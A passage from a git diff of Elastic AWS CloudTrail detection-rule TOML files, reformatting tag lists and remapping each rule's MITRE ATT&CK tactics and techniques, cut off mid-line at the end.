risk_score = 47 rule_id = "873b5452-074e-11ef-852e-f661ea17fbcc" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Persistence", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EC2", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS EC2", + "Use Case: Identity and Access Audit", + "Tactic: Privilege Escalation", + "Tactic: Lateral Movement", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -97,18 +106,36 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.004" +name = "SSH" +reference = "https://attack.mitre.org/techniques/T1021/004/" + + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.004" name = "SSH Authorized Keys" reference = "https://attack.mitre.org/techniques/T1098/004/" + + [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/integrations/aws/lateral_movement_ec2_instance_console_login.toml b/rules/integrations/aws/lateral_movement_ec2_instance_console_login.toml index ffdeb1c355e..e8de6075067 100644 --- a/rules/integrations/aws/lateral_movement_ec2_instance_console_login.toml +++ b/rules/integrations/aws/lateral_movement_ec2_instance_console_login.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/24" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -97,7 +97,19 @@ references = [ risk_score = 73 rule_id = "d1e5e410-3e34-412e-9b1f-dd500b3b55cd" severity = "high" -tags = ["Domain: Cloud", "Tactic: Initial Access", "Tactic: Lateral Movement", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EC2", "Data Source: AWS STS", "Data Source: AWS Sign-In", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS EC2", + "Data Source: AWS STS", + "Data Source: AWS Sign-In", + "Use Case: Identity and Access Audit", + "Tactic: Lateral Movement", + "Tactic: Credential Access", + "Tactic: Persistence", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -113,39 +125,66 @@ info where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.007" +name = "Cloud Services" +reference = "https://attack.mitre.org/techniques/T1021/007/" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + + + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" [[rule.threat.technique.subtechnique]] -id = "T1021.007" -name = "Cloud Services" -reference = "https://attack.mitre.org/techniques/T1021/007/" +id = "T1552.005" +name = "Cloud Instance Metadata API" +reference = "https://attack.mitre.org/techniques/T1552/005/" + + [rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/lateral_movement_sns_topic_message_publish_by_rare_user.toml b/rules/integrations/aws/lateral_movement_sns_topic_message_publish_by_rare_user.toml index 25f18611e04..2cb48308925 100644 --- a/rules/integrations/aws/lateral_movement_sns_topic_message_publish_by_rare_user.toml +++ b/rules/integrations/aws/lateral_movement_sns_topic_message_publish_by_rare_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/07" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/09" [rule] author = ["Elastic"] @@ -98,7 +98,17 @@ risk_score = 47 rule_id = "2112ecce-cd34-11ef-873f-f661ea17fbcd" setup = "AWS SNS topic data event types need to be enabled in the CloudTrail trail configuration to capture the Publish action. Ensure that the AWS CloudTrail service is [configured](https://docs.aws.amazon.com/sns/latest/dg/logging-using-cloudtrail.html#cloudtrail-data-events) to log data events for SNS." severity = "medium" -tags = ["Domain: Cloud", "Tactic: Exfiltration", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS SNS", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS SNS", + "Use Case: Threat Detection", + "Resources: Investigation Guide", + "Tactic: Lateral Movement", + "Tactic: Exfiltration", + "Tactic: Impact", +] timestamp_override = "event.ingested" type = "new_terms" @@ -130,16 +140,46 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1534" +name = "Internal Spearphishing" +reference = "https://attack.mitre.org/techniques/T1534/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1567" name = "Exfiltration Over Web Service" reference = "https://attack.mitre.org/techniques/T1567/" + [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1496" +name = "Resource Hijacking" +reference = "https://attack.mitre.org/techniques/T1496/" +[[rule.threat.technique.subtechnique]] +id = "T1496.004" +name = "Cloud Service Hijacking" +reference = "https://attack.mitre.org/techniques/T1496/004/" + + + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + [rule.new_terms] field = "new_terms_fields" value = ["cloud.account.id", "user.name", "aws.cloudtrail.resources.arn"] diff --git a/rules/integrations/aws/ml_cloudtrail_error_message_spike.toml b/rules/integrations/aws/ml_cloudtrail_error_message_spike.toml index 4d5ee39cd2f..1fb11e95294 100644 --- a/rules/integrations/aws/ml_cloudtrail_error_message_spike.toml +++ b/rules/integrations/aws/ml_cloudtrail_error_message_spike.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/13" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/18" [rule] anomaly_threshold = 50 @@ -112,3 +112,37 @@ tags = [ ] type = "machine_learning" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat.technique]] +id = "T1526" +name = "Cloud Service Discovery" +reference = "https://attack.mitre.org/techniques/T1526/" + +[[rule.threat.technique]] +id = "T1580" +name = "Cloud Infrastructure Discovery" +reference = "https://attack.mitre.org/techniques/T1580/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/integrations/aws/ml_cloudtrail_rare_error_code.toml b/rules/integrations/aws/ml_cloudtrail_rare_error_code.toml index 9f64ead7e86..f428b4da9a8 100644 --- a/rules/integrations/aws/ml_cloudtrail_rare_error_code.toml +++ b/rules/integrations/aws/ml_cloudtrail_rare_error_code.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/13" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/18" [rule] anomaly_threshold = 50 @@ -114,3 +114,61 @@ tags = [ ] type = "machine_learning" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat.technique]] +id = "T1526" +name = "Cloud Service Discovery" +reference = "https://attack.mitre.org/techniques/T1526/" + +[[rule.threat.technique]] +id = "T1580" +name = "Cloud Infrastructure Discovery" +reference = "https://attack.mitre.org/techniques/T1580/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + diff --git a/rules/integrations/aws/ml_cloudtrail_rare_method_by_city.toml b/rules/integrations/aws/ml_cloudtrail_rare_method_by_city.toml index 7093cd7002b..2634447e6ad 100644 --- a/rules/integrations/aws/ml_cloudtrail_rare_method_by_city.toml +++ b/rules/integrations/aws/ml_cloudtrail_rare_method_by_city.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/13" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/18" [rule] anomaly_threshold = 50 @@ -106,12 +106,24 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "809b70d3-e2c3-455e-af1b-2626a5a1a276" severity = "low" -tags = ["Domain: Cloud", "Tactic: Initial Access", "Data Source: AWS", "Data Source: Amazon Web Services", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -122,7 +134,3 @@ id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/aws/ml_cloudtrail_rare_method_by_country.toml b/rules/integrations/aws/ml_cloudtrail_rare_method_by_country.toml index 149e4f75951..c961ff23bf9 100644 --- a/rules/integrations/aws/ml_cloudtrail_rare_method_by_country.toml +++ b/rules/integrations/aws/ml_cloudtrail_rare_method_by_country.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/13" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/18" [rule] anomaly_threshold = 50 @@ -106,12 +106,24 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "dca28dee-c999-400f-b640-50a081cc0fd1" severity = "low" -tags = ["Domain: Cloud", "Tactic: Initial Access", "Data Source: AWS", "Data Source: Amazon Web Services", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -122,7 +134,3 @@ id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/aws/ml_cloudtrail_rare_method_by_user.toml b/rules/integrations/aws/ml_cloudtrail_rare_method_by_user.toml index e5d2305511a..db71d8487f4 100644 --- a/rules/integrations/aws/ml_cloudtrail_rare_method_by_user.toml +++ b/rules/integrations/aws/ml_cloudtrail_rare_method_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/13" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/18" [rule] anomaly_threshold = 75 @@ -104,12 +104,24 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "ac706eae-d5ec-4b14-b4fd-e8ba8086f0e1" severity = "low" -tags = ["Domain: Cloud", "Tactic: Initial Access", "Data Source: AWS", "Data Source: Amazon Web Services", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -120,7 +132,42 @@ id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.007" +name = "Cloud Services" +reference = "https://attack.mitre.org/techniques/T1021/007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat.technique]] +id = "T1041" +name = "Exfiltration Over C2 Channel" +reference = "https://attack.mitre.org/techniques/T1041/" + diff --git a/rules/integrations/aws/persistence_aws_attempt_to_register_virtual_mfa_device.toml b/rules/integrations/aws/persistence_aws_attempt_to_register_virtual_mfa_device.toml index f3eb07c91ed..c81083059cd 100644 --- a/rules/integrations/aws/persistence_aws_attempt_to_register_virtual_mfa_device.toml +++ b/rules/integrations/aws/persistence_aws_attempt_to_register_virtual_mfa_device.toml @@ -4,7 +4,7 @@ integration = ["aws"] maturity = "production" min_stack_version = "9.2.0" min_stack_comments = "aws.cloudtrail.session_credential_from_console field introduced in AWS integration version 4.6.0" -updated_date = "2026/03/23" +updated_date = "2026/02/25" [rule] author = ["Elastic"] @@ -121,21 +121,32 @@ iam where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.005" name = "Device Registration" reference = "https://attack.mitre.org/techniques/T1098/005/" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.006" +name = "Multi-Factor Authentication" +reference = "https://attack.mitre.org/techniques/T1556/006/" + + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_ec2_network_acl_creation.toml b/rules/integrations/aws/persistence_ec2_network_acl_creation.toml index cd06e93a54e..37786c113df 100644 --- a/rules/integrations/aws/persistence_ec2_network_acl_creation.toml +++ b/rules/integrations/aws/persistence_ec2_network_acl_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/06/04" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -63,7 +63,16 @@ references = [ risk_score = 21 rule_id = "39144f38-5284-4f8e-a2ae-e3fd628d90b0" severity = "low" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EC2", "Use Case: Network Security Monitoring", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS EC2", + "Use Case: Network Security Monitoring", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -90,18 +99,30 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [[rule.threat.technique.subtechnique]] id = "T1562.007" name = "Disable or Modify Cloud Firewall" reference = "https://attack.mitre.org/techniques/T1562/007/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/aws/persistence_ec2_route_table_modified_or_deleted.toml b/rules/integrations/aws/persistence_ec2_route_table_modified_or_deleted.toml index 884d6a0a35b..3e29917bfd5 100644 --- a/rules/integrations/aws/persistence_ec2_route_table_modified_or_deleted.toml +++ b/rules/integrations/aws/persistence_ec2_route_table_modified_or_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2021/06/05" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/04" [rule] author = ["Elastic", "Austin Songer"] @@ -91,7 +91,15 @@ references = [ risk_score = 21 rule_id = "e7cd5982-17c8-4959-874c-633acde7d426" severity = "low" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EC2", "Use Case: Network Security Monitoring", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS EC2", + "Use Case: Network Security Monitoring", + "Resources: Investigation Guide", + "Tactic: Persistence", +] timestamp_override = "event.ingested" type = "new_terms" @@ -128,20 +136,11 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1578" -name = "Modify Cloud Compute Infrastructure" -reference = "https://attack.mitre.org/techniques/T1578/" - -[[rule.threat.technique.subtechnique]] -id = "T1578.005" -name = "Modify Cloud Compute Configurations" -reference = "https://attack.mitre.org/techniques/T1578/005/" - [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.new_terms] field = "new_terms_fields" value = ["cloud.account.id", "user.name"] diff --git a/rules/integrations/aws/persistence_ec2_security_group_configuration_change_detection.toml b/rules/integrations/aws/persistence_ec2_security_group_configuration_change_detection.toml index 239f05267be..fd04f7d979e 100644 --- a/rules/integrations/aws/persistence_ec2_security_group_configuration_change_detection.toml +++ b/rules/integrations/aws/persistence_ec2_security_group_configuration_change_detection.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/05" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic", "Austin Songer"] @@ -71,7 +71,16 @@ references = ["https://docs.aws.amazon.com/AWSEC2/latest/WindowsGuide/ec2-securi risk_score = 21 rule_id = "29052c19-ff3e-42fd-8363-7be14d7c5469" severity = "low" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EC2", "Use Case: Network Security Monitoring", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS EC2", + "Use Case: Network Security Monitoring", + "Resources: Investigation Guide", + "Tactic: Persistence", + "Tactic: Defense Evasion" +] timestamp_override = "event.ingested" type = "query" @@ -108,17 +117,25 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [[rule.threat.technique.subtechnique]] id = "T1562.007" name = "Disable or Modify Cloud Firewall" reference = "https://attack.mitre.org/techniques/T1562/007/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/aws/persistence_iam_api_calls_via_user_session_token.toml b/rules/integrations/aws/persistence_iam_api_calls_via_user_session_token.toml index 7e081c3c90a..dde1ff0a43d 100644 --- a/rules/integrations/aws/persistence_iam_api_calls_via_user_session_token.toml +++ b/rules/integrations/aws/persistence_iam_api_calls_via_user_session_token.toml @@ -4,7 +4,7 @@ integration = ["aws"] maturity = "production" min_stack_version = "9.2.0" min_stack_comments = "aws.cloudtrail.session_credential_from_console field introduced in AWS integration version 4.6.0" -updated_date = "2026/03/23" +updated_date = "2026/02/25" [rule] author = ["Elastic"] @@ -107,7 +107,17 @@ references = ["https://www.sygnia.co/blog/sygnia-investigation-bybit-hack/"] risk_score = 21 rule_id = "c70d9f0d-8cb6-4cfc-85df-a95c1ccf4eab" severity = "low" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS CloudTrail", "Data Source: AWS IAM", "Data Source: AWS STS", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS CloudTrail", + "Data Source: AWS IAM", + "Data Source: AWS STS", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" @@ -125,21 +135,17 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_iam_create_login_profile_for_root.toml b/rules/integrations/aws/persistence_iam_create_login_profile_for_root.toml index 6e4d05f7250..829f6ade70b 100644 --- a/rules/integrations/aws/persistence_iam_create_login_profile_for_root.toml +++ b/rules/integrations/aws/persistence_iam_create_login_profile_for_root.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/02" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -143,18 +143,24 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.001" -name = "Additional Cloud Credentials" -reference = "https://attack.mitre.org/techniques/T1098/001/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/integrations/aws/persistence_iam_group_creation.toml b/rules/integrations/aws/persistence_iam_group_creation.toml index 900293ee8de..1eb39e9cb91 100644 --- a/rules/integrations/aws/persistence_iam_group_creation.toml +++ b/rules/integrations/aws/persistence_iam_group_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/06/05" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -98,16 +98,22 @@ event.dataset: aws.cloudtrail and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1136" +name = "Create Account" +reference = "https://attack.mitre.org/techniques/T1136/" +[[rule.threat.technique.subtechnique]] +id = "T1136.003" +name = "Cloud Account" +reference = "https://attack.mitre.org/techniques/T1136/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_iam_oidc_provider_created.toml b/rules/integrations/aws/persistence_iam_oidc_provider_created.toml index 6fde2381297..16c89c35694 100644 --- a/rules/integrations/aws/persistence_iam_oidc_provider_created.toml +++ b/rules/integrations/aws/persistence_iam_oidc_provider_created.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/05" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/05" [rule] author = ["Elastic"] @@ -98,7 +98,15 @@ references = [ risk_score = 47 rule_id = "47403d72-3ee2-4752-a676-19dc8ff2b9d6" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS IAM", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS IAM", + "Use Case: Identity and Access Audit", + "Tactic: Persistence", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" @@ -112,21 +120,39 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1484" name = "Domain or Tenant Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/" - [[rule.threat.technique.subtechnique]] id = "T1484.002" name = "Trust Modification" reference = "https://attack.mitre.org/techniques/T1484/002/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_iam_roles_anywhere_profile_created.toml b/rules/integrations/aws/persistence_iam_roles_anywhere_profile_created.toml index 4e17091a11c..cc0704696b8 100644 --- a/rules/integrations/aws/persistence_iam_roles_anywhere_profile_created.toml +++ b/rules/integrations/aws/persistence_iam_roles_anywhere_profile_created.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/20" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -115,7 +115,15 @@ references = [ risk_score = 21 rule_id = "1d4ca9c0-ff1e-11ee-91cc-f661ea17fbce" severity = "low" -tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS IAM", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags 